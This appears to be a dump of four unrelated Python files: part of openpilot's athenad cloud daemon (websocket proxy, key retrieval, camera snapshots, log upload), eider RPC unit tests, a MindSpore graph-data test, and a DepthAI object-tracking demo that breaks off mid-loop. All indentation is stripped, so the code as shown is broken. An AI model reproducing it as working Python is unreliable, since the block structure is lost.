dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs[:-1])
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop()
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.wc_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
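# Exponential backoff with jitter: a random wait in [0, min(2**retries, 128)) seconds.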
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
manage_tokens(api)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
#params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
#params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
test_eider.py
|
# Copyright 2017 Semiconductor Components Industries LLC (d/b/a "ON
# Semiconductor")
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_eider
~~~~~~~~~~
Unit tests for eider.
"""
from asyncio import (
CancelledError, coroutine, get_event_loop, Future, new_event_loop, sleep)
from functools import reduce
from gc import collect
from inspect import signature
from numbers import Number
from operator import mul
from os import environ
from sys import version_info
from threading import Thread
from time import sleep as time_sleep
try:
from typing import Callable
except ImportError:
class Callable:
pass
from pytest import fixture, raises
from eider import (
async_for, BlockingConnection, Connection, LocalObject, LocalRoot,
OBJECT_ID, RemoteError, serve, unmarshal_signature)
PORT = 12345
URL = 'ws://localhost:{}/'.format(PORT)
WS_LIB = environ.get('EIDER_PY_WS_LIB', 'aiohttp')
if version_info >= (3, 6):
# Python 3.6 has async comprehensions
exec("""async def aiter2list(it):
them = await it
return [x async for x in them]
""")
elif version_info >= (3, 5):
# Python 3.5 has 'async for'
exec("""async def aiter2list(it):
them = await it
xs = []
async for x in them:
xs.append(x)
return xs
""")
else:
# Python 3.4 doesn't have built-in support for async iterators
@coroutine
def aiter2list(it):
them = yield from it
xs = []
yield from async_for(them, coroutine(xs.append))
return xs
class Value(LocalObject):
"""Represents a numeric value."""
def __init__(self, lsession, x):
super().__init__(lsession)
self._x = x
def val(self):
return self._x
@coroutine
def set_val(self, x):
self._x = (yield from get_value(x))
@coroutine
def add(self, x):
"""Add another value to the value."""
self._x += (yield from get_value(x))
@coroutine
def subtract(self, x):
self._x -= (yield from get_value(x))
@coroutine
def multiply(self, x):
self._x *= (yield from get_value(x))
@coroutine
def divide(self, x):
self._x /= (yield from get_value(x))
@coroutine
def get_value(x):
# x may be a number, a local Value, or a remote Value
if isinstance(x, Number):
return x # number
else:
x = x.val()
if isinstance(x, Number):
return x # local Value
else:
return (yield from x) # remote Value
class Range(LocalObject):
def __init__(self, lsession, start, stop):
super().__init__(lsession)
self._start = start
self._stop = stop
def iter(self):
return self
def next(self):
i = self._start
if i >= self._stop:
return {'done': True}
self._start = i + 1
return {'value': i}
class Sequence(LocalObject):
def __init__(self, lsession, seq):
super().__init__(lsession)
self._seq = seq
def get(self, i):
return self._seq[i]
class API(LocalRoot):
_newables = [Value, Range, Sequence]
def num_objects(self):
return len(self._lsession.objects)
def call(self, f, *args):
return f(*args)
def store_cb(self, cb):
self.cb = cb
def call_cb(self, *args):
return self.cb(*args)
def passthru(self, x):
return x
def native(self, x):
return NativeObject(x)
class LocalAPI(API):
def product(self, *args):
return reduce(mul, args)
def square(self, x):
return x * x
class RemoteAPI(API):
target = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if RemoteAPI.target is None:
RemoteAPI.target = Future(loop=self._lsession.conn.loop)
self._cancelled = Future(loop=self._lsession.conn.loop)
def sum(self, *args):
return sum(args)
def cancellable(self):
def on_done(fut):
self._cancelled.set_result(fut.cancelled())
fut = Future(loop=self._lsession.conn.loop)
fut.add_done_callback(on_done)
return fut
@coroutine
def cancelled(self):
return (yield from self._cancelled)
@coroutine
def map(self, f: 'Callable', xs: list, async_=True) -> list:
if async_:
ys = []
for x in xs:
ys.append((yield from f(x)))
return ys
else:
return list(map(f, xs))
def getattr(self, obj, attr):
with obj as o:
return getattr(o, attr)
def set_target(self):
RemoteAPI.target.set_result(self._lsession.conn)
@coroutine
def bridge(self):
rconn = yield from RemoteAPI.target
bridge = yield from self._lsession.create_bridge(rconn)
return bridge
class TargetAPI(API):
def join(self, s, xs):
return s.join(xs)
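# NativeObject and native_function are intentionally plain Python objects (not LocalObjects);
# the test_native_* cases below use them to check that such objects and callables round-trip
# by reference and can be invoked remotely as callbacks.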
class NativeObject:
def __init__(self, x):
self.x = x
def add(self, x):
self.x += x
def get(self):
return self.x
def native_function(s):
return s + ' native'
@fixture(scope='module')
def server():
t = Thread(target=serve,
args=[PORT, new_event_loop()],
kwargs={'root': RemoteAPI,
'handle_signals': False,
'ws_lib': WS_LIB},
daemon=True)
t.start()
# wait a bit to make sure the server is established (websockets is slower
# than aiohttp)
time_sleep(0.1)
@fixture(scope='module')
def conn(server):
with BlockingConnection(URL, root=LocalAPI, ws_lib=WS_LIB) as conn:
yield conn
@fixture(scope='module')
def conn_async(server):
conn = Connection(URL, root=LocalAPI, ws_lib=WS_LIB)
try:
yield conn
finally:
conn.close()
get_event_loop().run_until_complete(conn.wait_closed())
@fixture
def lroot(conn):
with conn.create_local_session() as lroot:
yield lroot
@fixture
def rroot(conn):
with conn.create_session() as rroot:
yield rroot
@fixture
def rroot_async(conn_async):
session = get_event_loop().run_until_complete(conn_async.create_session())
with session as rroot:
yield rroot
@fixture
def rroot_codec(conn):
with conn.create_session('json', 'json') as rroot:
yield rroot
@fixture
def rroot_msgpack(conn):
with conn.create_session('msgpack', 'msgpack') as rroot:
yield rroot
@fixture(scope='module')
def conn_msgpack(server):
with BlockingConnection(
URL, lformat='msgpack', ws_lib=WS_LIB) as conn:
yield conn
@fixture
def rroot_bin(conn_msgpack):
with conn_msgpack.create_session() as rroot:
yield rroot
@fixture(scope='module')
def target(server):
def run():
@coroutine
def receive():
conn = Connection(URL, loop, root=TargetAPI, ws_lib=WS_LIB)
session = yield from conn.create_session()
with session as rroot:
yield from rroot.set_target()
yield from conn.wait_closed()
loop = new_event_loop()
loop.run_until_complete(receive())
Thread(target=run, daemon=True).start()
@fixture
def broot(rroot, target):
with rroot.bridge() as broot:
yield broot
def test_call(rroot):
"""Call a remote method."""
assert 17 == rroot.sum(3, 5, 9)
def test_call_async(rroot_async):
"""Call a remote method asynchronously."""
@coroutine
def test():
return (yield from rroot_async.sum(33, 55, 99))
assert 187 == get_event_loop().run_until_complete(test())
def test_cancel(rroot_async):
"""Cancel a remote method call."""
loop = get_event_loop()
fut = rroot_async.cancellable()
loop.call_soon(fut.cancel)
with raises(CancelledError):
loop.run_until_complete(fut)
assert loop.run_until_complete(rroot_async.cancelled())
def test_call_codec(rroot_codec):
"""Call using separately-encoded message bodies."""
assert 42 == rroot_codec.sum(24, 10, 8)
def test_new(rroot):
"""Create a remote object."""
assert 2 == rroot.new_Value(2).val()
def test_prop(rroot):
"""Set a remote property."""
rval = rroot.new_Value(2)
rval.val = 4
assert 4 == rval.val()
def test_prop_auto(rroot):
"""Create a new remote property."""
rval = rroot.new_Value(3)
rval.extra = 5
assert 5 == rval.extra()
def test_prop_auto_forbidden(rroot):
"""Assign to a forbidden remote property."""
rval = rroot.new_Value(4)
with raises(AttributeError):
rval.release = 6
def test_error_notfound(rroot):
"""Call a nonexistent remote method."""
with raises(AttributeError):
rroot.foo(42)
def test_error_runtime(rroot):
"""Call a remote method that raises an exception."""
with raises(ZeroDivisionError) as exc_info:
rroot.new_Value(42).divide(0)
assert isinstance(exc_info.value.__cause__, RemoteError)
def test_refcount(rroot):
"""Release a remote object."""
n = rroot.num_objects()
with rroot.new_Value(0):
assert n + 1 == rroot.num_objects()
assert n == rroot.num_objects()
def test_gc(rroot):
"""Garbage-collect a remote object."""
n = rroot.num_objects()
rval = rroot.new_Value(0)
assert n + 1 == rroot.num_objects()
del rval
# Make sure RemoteObject._close() (triggered by RemoteObject.__del__)
# completes. This may take several calls to gc.collect() on PyPy.
for _ in range(10):
collect()
get_event_loop().run_until_complete(sleep(0.1))
if n == rroot.num_objects():
break
else:
assert False
def test_with(rroot):
"""Try to access a remote object after it has been released."""
with rroot.new_Value(42) as rval:
rval.add(1)
with raises(LookupError):
rval.val()
if version_info >= (3, 5):
def test_async_with(rroot_async):
"""Try to access an async remote object after it has been released."""
locals = {}
exec("""async def test(rroot_async):
async with (await rroot_async.new_Value(42)) as rval:
await rval.add(1)
with raises(LookupError):
await rval.val()
""", globals(), locals)
get_event_loop().run_until_complete(locals['test'](rroot_async))
def test_session(conn):
"""Try to access a remote object after its session has been closed."""
with conn.create_session() as rroot:
rval = rroot.new_Value(0)
with raises(LookupError):
rval.val()
def test_iter(rroot):
"""Iterate over a remote object."""
assert [3, 4, 5, 6] == [x for x in rroot.new_Range(3, 7)]
def test_iter_async(rroot_async):
"""Iterate over a remote object asynchronously."""
assert [38, 39, 40, 41] == get_event_loop().run_until_complete(
aiter2list(rroot_async.new_Range(38, 42)))
def test_iter_seq(rroot):
"""Iterate over a remote sequence."""
seq = ['foo', 'bar', 42, 'spam']
assert seq == [x for x in rroot.new_Sequence(seq)]
def test_iter_seq_async(rroot_async):
"""Iterate over a remote sequence asynchronously."""
seq = ['foo', 'baz', 99, 'eggs']
assert seq == get_event_loop().run_until_complete(
aiter2list(rroot_async.new_Sequence(seq)))
def test_help_object(rroot):
"""Get documentation for a remote object."""
assert "Represents a numeric value." == rroot.new_Value(42).help()
def test_help_method(rroot):
"""Get documentation for a remote method."""
assert "Add another value to the value." == rroot.new_Value(42).add.help()
def test_dir(rroot):
"""List remote object's methods."""
assert """add addref dir divide help multiply release set_val signature
subtract taxa val""".split() == rroot.new_Value(42).dir()
def test_taxa(rroot):
"""List remote object's base classes."""
assert ['RemoteAPI', 'API'] == rroot.taxa()
def test_signature(rroot):
"""Get type signature for a remote method."""
sig = rroot.map.signature()
assert {
'defaults': {'async_': True},
'params': [['f', 'Callable'], ['xs', 'list'], ['async_', None]],
'return': 'list'
} == sig
# test unmarshal_signature as well
def g(f: 'Callable', xs: list, async_=True) -> list:
pass
assert signature(g) == unmarshal_signature(sig)
def test_callback_async(lroot, rroot):
"""Call a local method remotely, without remote post-processing."""
assert 135 == rroot.call(lroot.product, 3, 5, 9)
def test_callback_sync(lroot, rroot):
"""Call a local method remotely, with remote post-processing."""
assert [1, 4, 9, 16] == rroot.map(lroot.square, [1, 2, 3, 4])
def test_callback_error_async(lroot, rroot):
"""Call an exception-raising local method remotely, without remote
post-processing."""
with raises(ZeroDivisionError):
rroot.call(lroot.new_Value(42).divide, 0)
def test_callback_error_sync(lroot, rroot):
"""Call an exception-raising local method remotely, with remote
post-processing."""
lval = lroot.new_Value(42)
with raises(ZeroDivisionError):
rroot.map(lval.divide, [3, 1, 0, 7])
def test_callfront(rroot):
"""Call a remote method remotely."""
assert 66 == rroot.call(rroot.sum, 42, 24)
def test_rmarshal(rroot):
"""Return a remote method from a remote call."""
assert 42 == rroot.getattr(rroot, 'sum')(19, 10, 13)
def test_lmarshal(lroot, rroot):
"""Return a local method from a remote call."""
assert 120 == rroot.getattr(lroot, 'product')(8, 5, 3)
def test_lobject(lroot, rroot):
"""Pass a local object to a remote call."""
with lroot.new_Value(3) as lval, rroot.new_Value(4) as rval:
rval.add(lval)
assert 7 == rval.val()
def test_native_lmarshal(rroot):
"""Pass a local native object to a remote call."""
n = NativeObject(42)
assert n is rroot.passthru(n)
assert native_function is rroot.passthru(native_function)
def test_native_rmarshal(rroot):
"""Return a remote native object from a remote call."""
rn = rroot.native(99)
rn.add(1)
assert 100 == rn.get()
def test_native_callback(rroot):
"""Call a native method remotely."""
n = NativeObject(42)
rroot.call(n.add, 3)
assert 45 == n.x
def test_native_callback_function(rroot):
"""Call a native function remotely."""
assert 'gone native' == rroot.call(native_function, 'gone')
def test_native_callback_lambda(rroot):
"""Call an anonymous native function remotely."""
x = []
rroot.store_cb(lambda y: x.append(y))
rroot.call_cb(42)
assert [42] == x
def test_bridge(broot):
"""Call a bridged method locally."""
assert 'bridges are neat' == broot.join(' ',
'bridges are neat'.split())
def test_bridge_session(rroot, target):
"""Try to access a bridged object after its bridge has been closed."""
with rroot.bridge() as broot:
bval = broot.new_Value(0)
with raises(LookupError):
bval.val()
def test_bridge_error(broot):
"""Call a bridged method that raises an exception."""
with raises(ZeroDivisionError):
broot.new_Value(42).divide(0)
def test_bridge_callback(lroot, broot):
"""Call a local method across a bridge."""
assert 36 == broot.call(lroot.product, 3, 6, 2)
def test_bridge_callfront(broot):
"""Call a bridged method across a bridge."""
assert 'a+b+c' == broot.call(broot.join, '+', 'abc')
def test_msgpack(rroot_msgpack):
"""Call using msgpack codec."""
assert 11 == rroot_msgpack.sum(67, -59, 3)
def test_msgpack_binary(rroot_msgpack):
"""Pass binary data using msgpack."""
buf = bytes(range(7))
assert buf == rroot_msgpack.passthru(buf)
def test_msgpack_primary(rroot_bin):
"""Call with msgpack as the primary format."""
assert 176 == rroot_bin.sum(3, 14, 159)
def test_marshal_outofband(rroot_msgpack):
"""Marshal object references out of band."""
with rroot_msgpack.new_Value(6) as six:
with rroot_msgpack.new_Value(11) as eleven:
eleven.add(six)
assert 17 == eleven.val()
def test_pass_oid(rroot_msgpack):
"""Pass dict with special "__*__" key (only works with out-of-band
codecs)."""
obj = {OBJECT_ID: 42, "rsid": 99}
assert obj == rroot_msgpack.passthru(obj)
|
test_graphdata_distributed.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import random
import time
from multiprocessing import Process
import numpy as np
import mindspore.dataset as ds
from mindspore import log as logger
from mindspore.dataset.engine import SamplingStrategy
DATASET_FILE = "../data/mindrecord/testGraphData/testdata"
def graphdata_startserver(server_port):
"""
start graphdata server
"""
logger.info('test start server.\n')
ds.GraphData(DATASET_FILE, 1, 'server', port=server_port)
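# In 'server' mode GraphData loads the dataset once and serves it on the given port; the test
# below starts this in a separate process, waits a few seconds, then attaches a 'client'
# GraphData to the same port.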
class RandomBatchedSampler(ds.Sampler):
    # RandomBatchedSampler generates a random sequence, without replacement, in a batched manner
def __init__(self, index_range, num_edges_per_sample):
super().__init__()
self.index_range = index_range
self.num_edges_per_sample = num_edges_per_sample
def __iter__(self):
indices = [i+1 for i in range(self.index_range)]
# Reset random seed here if necessary
# random.seed(0)
random.shuffle(indices)
for i in range(0, self.index_range, self.num_edges_per_sample):
            # Drop the remainder (incomplete final batch)
if i + self.num_edges_per_sample <= self.index_range:
yield indices[i: i + self.num_edges_per_sample]
class GNNGraphDataset():
def __init__(self, g, batch_num):
self.g = g
self.batch_num = batch_num
def __len__(self):
# Total sample size of GNN dataset
# In this case, the size should be total_num_edges/num_edges_per_sample
return self.g.graph_info()['edge_num'][0] // self.batch_num
def __getitem__(self, index):
# index will be a list of indices yielded from RandomBatchedSampler
# Fetch edges/nodes/samples/features based on indices
nodes = self.g.get_nodes_from_edges(index.astype(np.int32))
nodes = nodes[:, 0]
neg_nodes = self.g.get_neg_sampled_neighbors(
node_list=nodes, neg_neighbor_num=3, neg_neighbor_type=1)
nodes_neighbors = self.g.get_sampled_neighbors(node_list=nodes, neighbor_nums=[
2, 2], neighbor_types=[2, 1], strategy=SamplingStrategy.RANDOM)
neg_nodes_neighbors = self.g.get_sampled_neighbors(node_list=neg_nodes[:, 1:].reshape(-1), neighbor_nums=[2, 2],
neighbor_types=[2, 1], strategy=SamplingStrategy.EDGE_WEIGHT)
nodes_neighbors_features = self.g.get_node_feature(
node_list=nodes_neighbors, feature_types=[2, 3])
neg_neighbors_features = self.g.get_node_feature(
node_list=neg_nodes_neighbors, feature_types=[2, 3])
return nodes_neighbors, neg_nodes_neighbors, nodes_neighbors_features[0], neg_neighbors_features[1]
def test_graphdata_distributed():
"""
Test distributed
"""
ASAN = os.environ.get('ASAN_OPTIONS')
if ASAN:
logger.info("skip the graphdata distributed when asan mode")
return
logger.info('test distributed.\n')
server_port = random.randint(10000, 60000)
p1 = Process(target=graphdata_startserver, args=(server_port,))
p1.start()
time.sleep(5)
g = ds.GraphData(DATASET_FILE, 1, 'client', port=server_port)
nodes = g.get_all_nodes(1)
assert nodes.tolist() == [101, 102, 103, 104, 105, 106, 107, 108, 109, 110]
row_tensor = g.get_node_feature(nodes.tolist(), [1, 2, 3])
assert row_tensor[0].tolist() == [[0, 1, 0, 0, 0], [1, 0, 0, 0, 1], [0, 0, 1, 1, 0], [0, 0, 0, 0, 0],
[1, 1, 0, 1, 0], [0, 0, 0, 0, 1], [0, 1, 0, 0, 0], [0, 0, 0, 1, 1],
[0, 1, 1, 0, 0], [0, 1, 0, 1, 0]]
assert row_tensor[2].tolist() == [1, 2, 3, 1, 4, 3, 5, 3, 5, 4]
edges = g.get_all_edges(0)
assert edges.tolist() == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
features = g.get_edge_feature(edges, [1, 2])
assert features[0].tolist() == [0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0,
0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0]
nodes_pair_list = [(101, 201), (103, 207), (204, 105), (108, 208), (110, 210), (202, 102), (201, 107), (208, 108)]
edges = g.get_edges_from_nodes(nodes_pair_list)
assert edges.tolist() == [1, 9, 31, 17, 20, 25, 34, 37]
batch_num = 2
edge_num = g.graph_info()['edge_num'][0]
out_column_names = ["neighbors", "neg_neighbors", "neighbors_features", "neg_neighbors_features"]
dataset = ds.GeneratorDataset(source=GNNGraphDataset(g, batch_num), column_names=out_column_names,
sampler=RandomBatchedSampler(edge_num, batch_num), num_parallel_workers=4,
python_multiprocessing=False)
dataset = dataset.repeat(2)
itr = dataset.create_dict_iterator(num_epochs=1, output_numpy=True)
i = 0
for data in itr:
assert data['neighbors'].shape == (2, 7)
assert data['neg_neighbors'].shape == (6, 7)
assert data['neighbors_features'].shape == (2, 7)
assert data['neg_neighbors_features'].shape == (6, 7)
i += 1
assert i == 40
if __name__ == '__main__':
test_graphdata_distributed()
|
depthai_combination.py
|
"""
Spatial AI demo combining Spectacular AI VIO with Tiny YOLO object detection
accelerated on the OAK-D.
Requirements:
pip install opencv-python matplotlib
To download the pre-trained NN model, run the following shell script (Git Bash is recommended for running it on Windows):
./depthai_combination_install.sh
Plug in the OAK-D and run:
python examples/depthai_combination.py
"""
import depthai as dai
import time
import cv2
import matplotlib.pyplot as plt
import spectacularAI
import threading
from pathlib import Path
import sys
import numpy as np
def make_pipelines(nnBlobPath, showRgb):
syncNN = True
# Create pipeline
pipeline = dai.Pipeline()
vio_pipeline = spectacularAI.depthai.Pipeline(pipeline)
# Define sources and outputs
camRgb = pipeline.createColorCamera()
spatialDetectionNetwork = pipeline.createYoloSpatialDetectionNetwork()
if showRgb:
xoutRgb = pipeline.createXLinkOut()
xoutNN = pipeline.createXLinkOut()
xoutBoundingBoxDepthMapping = pipeline.createXLinkOut()
if showRgb:
xoutRgb.setStreamName("rgb")
xoutNN.setStreamName("detections")
xoutBoundingBoxDepthMapping.setStreamName("boundingBoxDepthMapping")
# Properties
camRgb.setPreviewSize(416, 416)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
spatialDetectionNetwork.setBlobPath(nnBlobPath)
spatialDetectionNetwork.setConfidenceThreshold(0.5)
spatialDetectionNetwork.input.setBlocking(False)
spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)
spatialDetectionNetwork.setDepthLowerThreshold(100)
spatialDetectionNetwork.setDepthUpperThreshold(5000)
# Yolo specific parameters
spatialDetectionNetwork.setNumClasses(80)
spatialDetectionNetwork.setCoordinateSize(4)
spatialDetectionNetwork.setAnchors(np.array([10,14, 23,27, 37,58, 81,82, 135,169, 344,319]))
spatialDetectionNetwork.setAnchorMasks({ "side26": np.array([1,2,3]), "side13": np.array([3,4,5]) })
spatialDetectionNetwork.setIouThreshold(0.5)
camRgb.preview.link(spatialDetectionNetwork.input)
if showRgb:
if syncNN:
spatialDetectionNetwork.passthrough.link(xoutRgb.input)
else:
camRgb.preview.link(xoutRgb.input)
spatialDetectionNetwork.out.link(xoutNN.input)
spatialDetectionNetwork.boundingBoxMapping.link(xoutBoundingBoxDepthMapping.input)
vio_pipeline.stereo.depth.link(spatialDetectionNetwork.inputDepth)
return pipeline, vio_pipeline
def make_tracker():
"""
    Simple tracker/smoother/clustering for the YOLO-detected objects.
(The raw YOLO results look quite, well, raw, especially in 3D)
"""
tracked_objects = []
next_id = 1
class TrackedObject:
def __init__(self, t, p, l):
self.position = p
self.label = l
self.last_seen = t
self.n_detections = 1
nonlocal next_id
self.id = next_id
next_id += 1
def update(self, other):
UPDATE_ALPHA = 0.2
self.last_seen = other.last_seen
self.position = UPDATE_ALPHA * other.position + (1.0 - UPDATE_ALPHA) * self.position
self.n_detections += 1
def __repr__(self):
return '%s %d' % (self.label, self.id)
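    # Two detections with the same label are merged into one tracked object when their
    # camera-frame XY distance, divided by depth, stays below this threshold,
    # i.e. roughly 0.3 m apart at 1 m range (see find_best_match below).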
CLUSTERING_DISTANCE_AT_1M = 0.3
def find_best_match(new_obj, w_to_c_mat):
best = None
best_dist = CLUSTERING_DISTANCE_AT_1M
MIN_DEPTH = 0.5
local_pos = lambda p: (w_to_c_mat @ np.array(list(p) + [1]))[:3]
for old in tracked_objects:
if old.label != new_obj.label: continue
# ignore depth difference in clustering
loc_old = local_pos(old.position)
loc_new = local_pos(new_obj.position)
z = max([MIN_DEPTH, loc_old[2], loc_new[2]])
dist = np.linalg.norm((loc_old - loc_new)[:2]) / z
if dist < best_dist:
best_dist = dist
best = old
# if best: print(f'matched with {best} (seen {best.n_detections} time(s))')
return best
def track(t, detections, view_mat):
SCALE = 0.001 # output is millimeters
MIN_DETECTIONS = 8
DETECTION_WINDOW = 1.0
MAX_UNSEEN_AGE = 8.0
w_to_c_mat = np.linalg.inv(view_mat)
for d in detections:
p_local = np.array([
d.spatialCoordinates.x * SCALE,
-d.spatialCoordinates.y * SCALE, # note: flipped y
d.spatialCoordinates.z * SCALE,
1
])
p_world = (view_mat @ p_local)[:3]
try:
label = LABEL_MAP[d.label]
except:
label = d.label
# simple O(n^2)
for o in tracked_objects:
if o.label != label: continue
dist = np.linalg.norm(o.position - p_world)
if label in SELECTED_LABELS:
new_obj = TrackedObject(t, p_world, label)
existing = find_best_match(new_obj, w_to_c_mat)
if existing:
existing.update(new_obj)
else:
tracked_objects.append(new_obj)
def should_remove(o):
if o.n_detections < MIN_DETECTIONS and o.last_seen < t - DETECTION_WINDOW: return True
if o.last_seen < t - MAX_UNSEEN_AGE: return True
return False
# remove cruft
i = 0
while i < len(tracked_objects):
